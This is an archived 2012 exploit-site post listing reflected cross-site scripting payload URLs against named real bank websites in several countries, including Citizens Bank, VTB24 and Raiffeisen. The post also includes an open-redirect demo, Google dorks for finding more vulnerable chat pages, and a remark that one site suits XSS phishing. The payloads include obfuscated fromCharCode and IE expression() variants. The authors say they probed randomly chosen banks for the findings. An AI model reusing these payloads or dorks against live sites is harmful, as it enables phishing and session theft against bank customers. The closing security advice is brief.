exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Various Banks Cross Site Scripting

Various Banks Cross Site Scripting
Posted Mar 21, 2012
Authored by Sony, Flexxpoint

Various banks such as Citizens Bank, Wells Fargo, and Pro Credit suffer from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 4b9a310c66cdfa3703c7d42f316b457b45c83f85c84681b139662880b053d9f7

Various Banks Cross Site Scripting

Change Mirror Download
# Title: Some bank websites that suffer from Cross-site scripting
vulnerabilities.
# Author: Sony and Flexxpoint
# Data: 21.03.2012
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog : http://flexxpoint.blogspot.com/
# Site: http://insecurity.ro



We staged an experiment out of interest. We looked through several randomly
selected websites of Worlds banks to check them for vulnerabilities. This
was done rather quick even without any specialized software. The results
were not surprising. We will demonstrate different bugs of the same type.

Demo:

http://www.banki.ru/bitrix/rku.php?id=829&goto=http://insecurity.ro

Good redirect in bitrix:

inurl:bitrix/rk.php


http://www.citizensbank.com/
(U.S.)

Simple (in the Search)

http://www.citizensbank.com/search/?query=Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E

http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s1600/citiz.JPG


https://www.wellsfargo.com/
(U.S.)

http://codepad.org/inXkWxYw

http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s1600/well.JPG


http://www.eximb.com
(Ukraine)

http://www.eximb.com/rus/personal/everyday/internet_banking/?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s1600/ukr.JPG


http://procreditbank.bg/main/bg/index.php
(Bulgaria)

https://probanking.procreditbank.bg/regist/default.asp?password2=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E

http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s1600/bg.JPG

http://www.vtb24.ru
(Russia)

http://www.vtb24.ru/news/Pages/nizhnij-tagil.aspx?year=2012&category=%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E

http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s1600/vtb24.JPG

http://www.homecredit.ru/
(Russia)

https://online.homecredit.ru/ChatApp/login.jsp

or..

https://online.homecredit.ru/ChatApp/Chat/HtmlChatFrameSet.jsp

We have a html code injection in the chat.

http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s1600/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG

http://www.mastercardpremium.ru
(Russia, but not a official site, but good for xss phishing attack)

Simple.

http://www.mastercardpremium.ru/search?phrase=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s1600/master.JPG


http://www.raiffeisen.ch/web/home_de
(Switzerland)

http://www.raiffeisen.ch/raiffeisen/internet/rb0027.nsf/fAskForDeletionFile?ReadForm&File=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E

http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s1600/1a.JPG

http://boerse.raiffeisen.ch/raiffeisen2/listings/intraday.jsp?listing=998089,4,1&name=SM%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E

http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s1600/2a.JPG


http://www.uwcfs.com/
(Czech Republic)

XSS in Chat. And we can see:

http://www1.migbank.com/

https://www.msufcu.org/

Google Dorks: inurl:/phplive/message_box.php?theme=

1 bug = a lot of web sites..

https://secure.moneypolo.cz/phplive/message_box.php?theme=&l=admin&x=1&deptid=1%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E

http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s1600/internetbank.JPG


http://www.bcb.gob.bo/index.php
(Bolivia)
(but work only on old IE versions,and IE related browsers-Maxton,Green..etc)

http://www.bcb.gob.bo/index.php?q=%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20&combos1_1=1&combos1_2=1&combos1_3=1&combos1_4=1&combos1_5=1&combos1_6=1&combos1_7=1&combos1_8=1&combos1_9=1&subcateg1=1&Submit=Buscar

http://img29.imageshack.us/img29/4543/screenshot2232012.png


http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s1600/bolivia.JPG


We would like to add a few words about security. There's no need to panic,
perfect security just isn't possible, though we should try to come as close
as possible. We would like to give a couple of advices for these banks.
They should certainly pay more attention to their IT personnel's competence
and discipline, spend their money not only on market research, but also on
penetration testing, organize penetration testers' contests like Google and
Facebook do or possible have their own staff of penetration testers. The
bank personnel should be tested for their vulnerability to social
engineering. These are just the basics.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close